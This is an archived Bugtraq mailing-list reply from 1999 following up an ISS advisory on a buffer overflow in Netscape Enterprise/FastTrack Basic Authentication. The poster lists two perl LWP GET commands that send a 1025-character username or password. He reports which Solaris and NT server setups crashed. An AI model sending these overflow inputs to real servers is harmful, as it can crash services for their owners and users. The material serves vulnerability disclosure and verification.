Bugtraq mailing list archives
Re: ISS Security Advisory: Buffer Overflow in Netscape Enterprise and FastTrack Authentication Procedure
From: monwel () INTERHACK NET (Doug Monroe)
Date: Thu, 2 Dec 1999 13:17:32 -0500
RE:
ISS Security Advisory December 1, 1999 Buffer Overflow in Netscape Enterprise and FastTrack Authentication
> Procedure I made a few simple pokes with variants of perl LWP's 'GET' function at areas of 2 NES 3.x servers that are protected with Basic Authentication. For example- $ GET -C username:`perl -e 'print "A"x1025'` http://server/private-path $ GET -C `perl -e 'print "A"x1025'`:password http://server/private-path Solaris 2.6/NES 3.5.1 (and 3.6.3)- username:LONGpw -> http://server/private-path - NO KILL LONGusername:pw -> http://server/private-path - NO KILL NT4/SP4/NES 3.6.2- username:LONGpw -> http://server/private-path - NO KILL LONGusername:pw -> http://server/private-path - KILL Potentially important diffs/notes: On the Solaris box, the private area was config'd with .nsconfig/NCSA-style ACL. On the NT, the private area was protected using local-db ACL, not NCSA-style. I have not tried poking a local-db/LDIF protected area on Solaris. I have not tried poking a .nsconfig/NCSA-style area on NT. I have not tried poking at the admin server of either box. -- Doug Monroe www.interhack.net
Current thread:
- ISS Security Advisory: Buffer Overflow in Netscape Enterprise and FastTrack Authentication Procedure Aleph One (Dec 01)
- Re: ISS Security Advisory: Buffer Overflow in Netscape Enterprise and FastTrack Authentication Procedure Keith Piepho (Dec 02)
- Re: ISS Security Advisory: Buffer Overflow in Netscape Enterprise Keith R. Jarvis (Dec 02)
- <Possible follow-ups>
- Re: ISS Security Advisory: Buffer Overflow in Netscape Enterprise and FastTrack Authentication Procedure Doug Monroe (Dec 02)
- Re: ISS Security Advisory: Buffer Overflow in Netscape Enterprise and FastTrack Authentication Procedure Keith Piepho (Dec 02)